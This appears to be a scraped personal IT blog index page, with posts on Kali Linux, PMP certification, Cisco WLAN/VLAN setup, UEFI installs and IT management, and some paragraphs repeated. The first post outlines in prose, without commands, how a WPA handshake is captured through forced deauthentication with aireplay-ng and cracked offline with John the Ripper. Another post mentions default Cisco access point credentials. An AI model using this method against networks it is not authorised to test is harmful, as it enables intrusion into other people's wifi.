John the Ripper (JtR) cracks passwords offline. That is, "incorrect number of passwords entered limit" does not affect JtR. As you can see in the video, using aireplay-ng, fake deauthentication packets were injected to the wireless access point to force all users to reauthenticate (without them knowing it). During reauthentication, the WPA keys are exchanged between the client and the wireless access point. This exchange was recorded into a file "wificrack.cap" and the hashed PSK (Pre-Shared Key) was then cracked using JtR. In the video, you can also see that the output file of airodump-ng can be opened using Wireshark. Opening the cap file with Wireshark reveals a lot of information about the clients connected to the wireless access point. For instance, we know the wireless AP is a Cisco-Li (Cisco-Linksys), and the WPA handshake captured was from an Apple device. The MAC address is even shown!
Friday, February 13, 2015
How to Hack a WPA Wireless Network (Wifi) using Aircrack-ng and John the Ripper
John the Ripper (JtR) cracks passwords offline. That is, "incorrect number of passwords entered limit" does not affect JtR. As you can see in the video, using aireplay-ng, fake deauthentication packets were injected to the wireless access point to force all users to reauthenticate (without them knowing it). During reauthentication, the WPA keys are exchanged between the client and the wireless access point. This exchange was recorded into a file "wificrack.cap" and the hashed PSK (Pre-Shared Key) was then cracked using JtR. In the video, you can also see that the output file of airodump-ng can be opened using Wireshark. Opening the cap file with Wireshark reveals a lot of information about the clients connected to the wireless access point. For instance, we know the wireless AP is a Cisco-Li (Cisco-Linksys), and the WPA handshake captured was from an Apple device. The MAC address is even shown!
Wednesday, February 4, 2015
Freeing Disk Space in Kali Linux (Basic steps), Especially the apt-get Cache
Kali is a Debian-based Linux developed with penetration-testers in mind. Think of it as a toolbox. It is basically a Debian Linux, but with all the penetration testing tools installed, for free. This includes Metasploit, OpenVAS vulnerability scanners, exploitDB, Hydra, aircrack-ng, John the Ripper, etc. These come on top Linux's common formidable tools such as OpenSSH (for creating tunnels), netcat, and nmap to name a few.
Since Kali is Debian, then the method used here do apply to any Debian-based Linux systems (+ Ubuntu). Although, since we are talking about Kali, which is usually ran as 'root', then most of the screenshots will show that the user is running the commands as root. If you are not logged in as root, just add the word 'sudo' in the beginning of every command. For example: instead of issueing command 'apt-get clean', type 'sudo apt-get clean'.
Let us assume, you get an error in your Kali Linux saying that you are running out of space. In the screenshot below, My Kali is running on Oracle VirtualBox with a dynamically allocated 15Gb of space. Technically I don't have to worry about disk space because the Virtual Disk will expand when needed. But I still want to free some space.
Step 1: Check Disk space and where you are consuming space the most. Use df -h. the '-h' option in df is to format the result in 'human-readable' format.
Since Kali is Debian, then the method used here do apply to any Debian-based Linux systems (+ Ubuntu). Although, since we are talking about Kali, which is usually ran as 'root', then most of the screenshots will show that the user is running the commands as root. If you are not logged in as root, just add the word 'sudo' in the beginning of every command. For example: instead of issueing command 'apt-get clean', type 'sudo apt-get clean'.
Let us assume, you get an error in your Kali Linux saying that you are running out of space. In the screenshot below, My Kali is running on Oracle VirtualBox with a dynamically allocated 15Gb of space. Technically I don't have to worry about disk space because the Virtual Disk will expand when needed. But I still want to free some space.
 |
| You get an error that you are running on disk space. Kali |
 |
| df -h results show the entire disk is "full" |
Tuesday, January 27, 2015
Practical Advice in Pursuing the Project Management Professional (PMP) Credential
Recently, I became a Project Management Professional (PMP) credential holder. I personally find the exam tough and the entire process stringent. Thus, I consider this achievement a milestone in my career.
In this blog, I will give advice, based on my own experience, how one can maximize the effort, and financial resources required to achieve the credential.
Just recently somebody asked me what my foremost advice would be if someone is seriously working into achieving the PMP certification. My foremost advice is also the most obvious.
1. Become a member of Project Management Institute (PMI). The benefits of membership are numerous. First, you get an immediate savings of approximately $10.00 in your application fee. The application fee for CBT (Computer Based Test) is $405 for members, and $555 for non members. To become a member, you are charged some $140 membership fee. Thus, in all, a new PMI member PMP applicant is charged $545, versus $555 for non-members. BUT (the big BUT), as a member you get free access to the Project Management Book of Knowledge (PMBok), latest edition, which is the basis of 90% of the PMP exam questions. Also, as a PMI member, you get access to the MyPMI dashboard (a portion of which is shown above). The dashboard makes it easy for you to apply for the credential online. Applying online is a big relief. PMI requires you to fulfill 4,500 project hours for degree holders, or 7,500 project hours for secondary school (high school) diploma holders. These project hours should have spanned all five process groups (initiating, planning, executing, monitoring and controlling, closing); and they have to be non-overlapping. These hours also need to be logged for each project, and confirmed by your direct supervisor.
I had a colleague who did the project hours logging using PMI paper forms. They are tedious, and tend to be messy. . The online application form is cleaner (shown in the right), and makes it easier for you to track if you already reached the required number of hours to apply for the credential.
Which brings me to my next advice.
2. Make sure to log your project hours accurately, and discuss the project description with your manager. The application process allows for certain liberties, after all the project hours are estimations. But if your application is selected for audit, your manager will be required to confirm (by a signature, with comments on a sealed envelop) your application - particularly the project hours, duration, and description. This also means...
In this blog, I will give advice, based on my own experience, how one can maximize the effort, and financial resources required to achieve the credential.
1. Become a member of Project Management Institute (PMI). The benefits of membership are numerous. First, you get an immediate savings of approximately $10.00 in your application fee. The application fee for CBT (Computer Based Test) is $405 for members, and $555 for non members. To become a member, you are charged some $140 membership fee. Thus, in all, a new PMI member PMP applicant is charged $545, versus $555 for non-members. BUT (the big BUT), as a member you get free access to the Project Management Book of Knowledge (PMBok), latest edition, which is the basis of 90% of the PMP exam questions. Also, as a PMI member, you get access to the MyPMI dashboard (a portion of which is shown above). The dashboard makes it easy for you to apply for the credential online. Applying online is a big relief. PMI requires you to fulfill 4,500 project hours for degree holders, or 7,500 project hours for secondary school (high school) diploma holders. These project hours should have spanned all five process groups (initiating, planning, executing, monitoring and controlling, closing); and they have to be non-overlapping. These hours also need to be logged for each project, and confirmed by your direct supervisor.
I had a colleague who did the project hours logging using PMI paper forms. They are tedious, and tend to be messy. . The online application form is cleaner (shown in the right), and makes it easier for you to track if you already reached the required number of hours to apply for the credential.
Which brings me to my next advice.
2. Make sure to log your project hours accurately, and discuss the project description with your manager. The application process allows for certain liberties, after all the project hours are estimations. But if your application is selected for audit, your manager will be required to confirm (by a signature, with comments on a sealed envelop) your application - particularly the project hours, duration, and description. This also means...
Friday, June 13, 2014
How to configure TFTP Server in your Linux Machine (Debian), and how to solve Permission Denied Error (Error Code 2)
So suppose you want to copy startup-config files from your Cisco to your laptop running a virtual machine of Kali Linux, (Debian). Let us suppose further that your Cisco router/switch cannot do SSH otherwise, we'll just use scp which is safer, and does not need any further special configuration for Linux devices.
Here's how to do it:
- Make sure you have the Virtual Machine in Bridged Adapter to your WIndows 7 machine's ethernet adapter. I'm using virtual box so in my case, I have to create a bridged adapter first. In Virtuabox (not in the Guest OS or Virtual Machine's Window) click File >> preferences >> Network. Then under tha tabe Bridged Adapters, create at least one adapter.
Sunday, June 8, 2014
How to Install Windows 7 on a UEFI enabled Computer
We recently bought a Lenovo T-440s amd immediately loved it, except it came with a Windows 8 Professional, 64-bit. It had "downgrade rights" for Windows 7 Pro 64-bit. Unfortuantely, our corporate IT environment does not (yet) encourage Windows 8 especially in laptops nor desktops, so I really was obligated to downgrade it to Windows 7 Pro/Enterprise.
The T-440s is Windows 8 optimized and is UEFI and secure-boot enabled. As an IT professional, I am also interested in how UEFI works (later I'll write a blog after I successfully installed Kali Linux on dual-boot in a UEFI system) and if it indeed delivers to is promise. UEFI is explained in detail here. Microsoft also explains UEFI and how it is here.
Do note that UEFI systems behave differently depending on the model and brand of the computer. This how-to post is specifc to the T-440s. While the concept and the general procedures may be the same as with other laptops (i.e. Acer, Asus, HP, Dell, etc.) the behavior may differ slightly.
The T-440s is Windows 8 optimized and is UEFI and secure-boot enabled. As an IT professional, I am also interested in how UEFI works (later I'll write a blog after I successfully installed Kali Linux on dual-boot in a UEFI system) and if it indeed delivers to is promise. UEFI is explained in detail here. Microsoft also explains UEFI and how it is here.
Do note that UEFI systems behave differently depending on the model and brand of the computer. This how-to post is specifc to the T-440s. While the concept and the general procedures may be the same as with other laptops (i.e. Acer, Asus, HP, Dell, etc.) the behavior may differ slightly.
The Objective: Install Windows 7 Professional 64-bit on a UEFI enabled Lenovo T-440s.
Before we begin, let us first discuss what are the differences between installing Windows OS in UEFI and in non-UEFI mode (aka Legacy Boot Mode)- UEFI installation of Windows 7 only works in 64-bit installations.
- UEFI does not work in Win XP.
- By default T-440s ships with Windows 8 and with UEFI and Secure Boot enabled. However Windows 7 normally is not for UEFI systems. If your Lenovo Thinkpad T-440s ships with Windows 7, the settings may have been changed.
- The Lenovo Thinkpad T-440 does not have a CD/DVD Drive, you have to either attach a removable drive, or create a EFI-bootable Windows 7 USB Stick.
Here's how:
- Go to the BIOS Setup by rebooting your Lenovo Thinkpad T-440s then, repeatedly press F1 until you get to the BIOS Set-up Screen.
Tuesday, March 4, 2014
Configuring Cisco WLAN with multiple SSIDs in different VLANs - Part 1
note: Screenshots and configuration examples are using a Cisco 2500 series WLAN controller (aka WLC). The Cisco 2500 series controller is connected to a cisco 3750 or 3650 L3 switch. This article assumes that inter-VLAN routing is already working and only the WLAN controller needs to be configured.
Usually, enterprise networks are on multiple VLAN environment. The Wifi access points provide access to each of these different VLANs by broadcasting different SSIDs attached to different WLAN profiles. Let's say we want to configure our WLAN controller to broadcast two SSIDs namely:
1. GUEST on VLAN 5 (10.8.5.0/24);
2. IT-Department on VLAN 13 (10.8.6.0/24);
Also, let's assume VLAN 219 is pre-configured with the following information:
1. VLAN 219 is NETWORK-VLAN @10.8.219.0/24)
2. interface vlan 219 IP address is 10.8.219.1
3. a DHCP server located in VLAN 219 with IP address 10.8.219.50/24.
4. WLAN controller will be configured with IP address 10.8.219.251 in VLAN 219
5. the Access Points (APs) 10.8.219.248-250, also in VLAN 219.
There are two parts to this task. First is the VLAN configuration required in our 3750/3650 layer 3 switch which will be discussed in this article. Part 2 is configuring our WLAN controller with the WLAN profiles, SSID, and interfaces. For brevity, I will skip discussion on inter-VLAN configuration and assume that that the network converges, and inter-VLAN routing is configured properly.
Part 1: Configure the 3750/3650 layer 3
1. Configure the port interface in our L3 switch as a trunk:interface GigabitEthernet1/0/23
description *** LINK TO WIRELESS-CONTROLER ***
switchport trunk encapsulation dot1q
switchport trunk allowed vlan 5, 13
switchport mode trunk
!The next commands are optional
switchport trunk native vlan 219
udld port aggressive
- "switchport trunk allowed VLAN <ID>" command explicitly defines what VLANs are only allowed in the interface. In this case, only VLANs 5 (Guest) and 13 (IT-Department) are allowed. This can be optional but I would recommend you do this to minimize broadcasts traversing through the trunk.
- "switchport trunk native vlan <ID>" command changes the native VLAN. By default, the Native VLAN is 1. But this is already expected so we change it. The native VLAN is where all vlan traffic converges and traverses. This command is optional.
- "udld port aggressive" is an optional configuration. It detects if the link is uni-directional and adjusts accordingly to avoid spanning-tree loops. All ports should support UDLD aggressive mode in order to work.
Configuring Cisco WLAN with multiple SSIDs in different VLANs - Part 2
This is part 2/2 of the series. Part 1 discussed the assumptions and the required layer 3 switch configurations. Please read part 1 prior to reading part 2 You can view part 1 here.
======================================================================
note: Screenshots and configuration examples are using a Cisco 2500 series WLAN controller (aka WLC). The Cisco 2500 series controller is connected to a cisco 3750 or 3650 L3 switch. This article assumes that inter-VLAN routing is already working and only the WLAN controller needs to be configured.
======================================================================
IMPORTANT REMINDER: before you do all the configuration, note that the LWAPP image version cannot be higher than that of the WLAN controller. a quick "show version" command on both the WLC and the LWAPP will save you all the time and effort.
From LWAPP: the default username is "Cisco" and password is "Cisco":
output of show version:
cisco AIR-CAP702I-F-K9 (MIPS74k) processor (revision 01) with 73728K/57344K bytes of memory.
Processor board ID KWC184402C5
MIPS74k CPU at 40Mhz, revision number 0x0000
Last reset from power-on
LWAPP image version 7.5.1.33
1 Gigabit Ethernet interface
In this case, configuring the WLAN controller and the LWAPP will not work. the LWAPP will not associate. We will need to either downgrade the image of the LWAPP, or upgrade the image of the WLAN Controller.
=======================================================================
As usual, the first thing to do is plug the WLAN Controller's port 1 to the trunk-configured port in the L3 switch (discussed in part 1). Port 1 is the green colored portin the figure below.
The other 3 ports will be connected to your APs (Access Points). For brevity, we will not discuss configuring licenses and upgrading firmware in this article.
======================================================================
note: Screenshots and configuration examples are using a Cisco 2500 series WLAN controller (aka WLC). The Cisco 2500 series controller is connected to a cisco 3750 or 3650 L3 switch. This article assumes that inter-VLAN routing is already working and only the WLAN controller needs to be configured.
======================================================================
IMPORTANT REMINDER: before you do all the configuration, note that the LWAPP image version cannot be higher than that of the WLAN controller. a quick "show version" command on both the WLC and the LWAPP will save you all the time and effort.
From LWAPP: the default username is "Cisco" and password is "Cisco":
output of show version:
cisco AIR-CAP702I-F-K9 (MIPS74k) processor (revision 01) with 73728K/57344K bytes of memory.
Processor board ID KWC184402C5
MIPS74k CPU at 40Mhz, revision number 0x0000
Last reset from power-on
LWAPP image version 7.5.1.33
1 Gigabit Ethernet interface
AIR-CAP means this is a Lightweight Access Point (aka a Controller-based Access Point). If it says AIR-WAP, then this is not a controller-based access point and will therefore not associate to the Controller.
From the Controller:
(Cisco Controller) >show sysinfo
Manufacturer's Name.............................. Cisco Systems Inc.
Product Name..................................... Cisco Controller
Product Version.................................. 7.4.121.0
Bootloader Version............................... 1.0.20
Field Recovery Image Version..................... 1.0.0
Firmware Version................................. PIC 16.0
=======================================================================
Part 2: Configure the WLAN Controller
In the first part, we discussed the Layer 3 switch configuration requirements. In case you missed it, please read the first part of this article here: Configuring Cisco WLAN with multiple SSIDs in different VLANs - Part 1As usual, the first thing to do is plug the WLAN Controller's port 1 to the trunk-configured port in the L3 switch (discussed in part 1). Port 1 is the green colored portin the figure below.
The other 3 ports will be connected to your APs (Access Points). For brevity, we will not discuss configuring licenses and upgrading firmware in this article.
Sunday, August 18, 2013
Compelling Scoreboards Do Keep Projects on Track
Technology management involves liberal amounts of project management. Like construction engineers and architects, we Technology Managers often find ourselves being asked to design technology solutions, and implementing these. But for most of us, driving projects to be completed on time, and within cost has proven challenging - especially in this era where most technology projects are implemented by vendors and outsourced partners.
Throughout the years, I found out that keeping a compelling scoreboard of the project not only helps me, as the Project Manager, keep track of its progress, but also elicits commitment from the implementing team, vendors included. It also helps in communicating the project's progress to other stakeholders (i.e. executives, other departments) easier. Keeping a compelling scoreboard is extolled as discipline three in FranklinCovey Institute's Four Discpline of Execution (4DX). While 4DX's approach is utilitarian and practicable, scoreboards (or dashboards) is not unique to 4DX. It is also espoused in various management cases and thesis (i.e. Project Management Institute, Balanced Scorecard, etc.). Although, it is in 4DX where the case of "scoreboards should be compelling", is consistently made.
Take the snapshot of the simple project management scoreboard below as an example. The template for this can also be downloaded (link provided below) to help you start your own scoreboard for your projects.
All effective scoreboards should follow the following characteristics:
All effective scoreboards should follow the following characteristics:
Monday, May 28, 2012
Build or Buy Analysis: Determining the True Cost of Software Development vs. Ready Made Solutions
When faced with options to whether to build an IT system; or, to lease or subscribe to ready-made cloud-based solutions; most of us do what we were taught in management school. We open our poignant excel workbook, and compute the cost of the application by estimating materials and person-hours required to complete the project.
We do this by first forecasting the number of person-hours it would take to build the system. Then we put a certain monetary value to these person-hours, which is usually the average salary of the software engineers that will be hired to build the system plus a little overhead. We then put all the other necessary materials to finish the system such as cost of servers, peripherals, etc.
We then estimate the yearly cost of maintaining the system, which we usually approximate at 20% of the initial build cost. After which we pick a discounting rate ranging from 8% to 12% (10% is usually the sweet spot), and do a Net Present Value (NPV) calculation of the Total Cost of Ownership (TCO) of the system from year 0 (today) to year 4. We top it off by adding another 10%-20% contingency reserve margin to cover for ‘other unseen costs’.
After doing all that, we go window-shopping. We go through a list of cloud-based solutions and ask them for their subscription costs. We compare the yearly subscription cost for cloud-based solution A, B, C…. and the cost of building the system. Finally, we are ready to make a decision: do we develop our own custom application, or do we lease or subscribe to Software as a Service (SAAS) solutions?
If this is how you do decision analyses, I encourage you to look at the past 5-10 build-or-buy decisions you made. You will find yourself that often you decided to build the application either in-house; or, using outsourced development partners. Rarely (perhaps 10% or even less probability), have you decide in favor of cloud-based solutions.
We do this by first forecasting the number of person-hours it would take to build the system. Then we put a certain monetary value to these person-hours, which is usually the average salary of the software engineers that will be hired to build the system plus a little overhead. We then put all the other necessary materials to finish the system such as cost of servers, peripherals, etc.
We then estimate the yearly cost of maintaining the system, which we usually approximate at 20% of the initial build cost. After which we pick a discounting rate ranging from 8% to 12% (10% is usually the sweet spot), and do a Net Present Value (NPV) calculation of the Total Cost of Ownership (TCO) of the system from year 0 (today) to year 4. We top it off by adding another 10%-20% contingency reserve margin to cover for ‘other unseen costs’.
After doing all that, we go window-shopping. We go through a list of cloud-based solutions and ask them for their subscription costs. We compare the yearly subscription cost for cloud-based solution A, B, C…. and the cost of building the system. Finally, we are ready to make a decision: do we develop our own custom application, or do we lease or subscribe to Software as a Service (SAAS) solutions?
If this is how you do decision analyses, I encourage you to look at the past 5-10 build-or-buy decisions you made. You will find yourself that often you decided to build the application either in-house; or, using outsourced development partners. Rarely (perhaps 10% or even less probability), have you decide in favor of cloud-based solutions.
Sunday, May 6, 2012
Do VLANs Unduly Complicate the Network?
Simplifying the IT infrastructure is among the top priorities of IT executives. Various surveys claiming CIOs are beginning to embrace Software as a Service (SAAS) models is actually proof that simplification of the infrastructure is a key objective. The more complicated the IT infrastructure becomes, the more expensive it is to maintain it. It also will take significantly longer person-hours to fulfill change requests.
As an IT manager, simplifiying my IT support structure is also one of my key goals. One of the most common discussion points regarding this subject is the number of VLANs required for a branch office; or, if VLANs are ever needed in the branch office network design.
My answer is always 'yes'. Surprisingly, I often find myself defending that position.
As an IT manager, simplifiying my IT support structure is also one of my key goals. One of the most common discussion points regarding this subject is the number of VLANs required for a branch office; or, if VLANs are ever needed in the branch office network design.
My answer is always 'yes'. Surprisingly, I often find myself defending that position.
Subscribe to:
Posts (Atom)
